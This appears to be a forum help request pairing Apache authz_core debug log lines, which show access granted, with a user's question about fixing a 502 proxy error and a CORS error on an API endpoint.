[Sun Jul 07 04:28:08.835566 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:09.078776 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:09.078805 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:09.330994 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:09.331021 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted

i don't know how to resolve this issue as i get 502 proxy error for my api: https://api.domain.net/registerlogin and a cors error in console confusing. i did some changes to rectify cors but dont know how to correct proxy error.
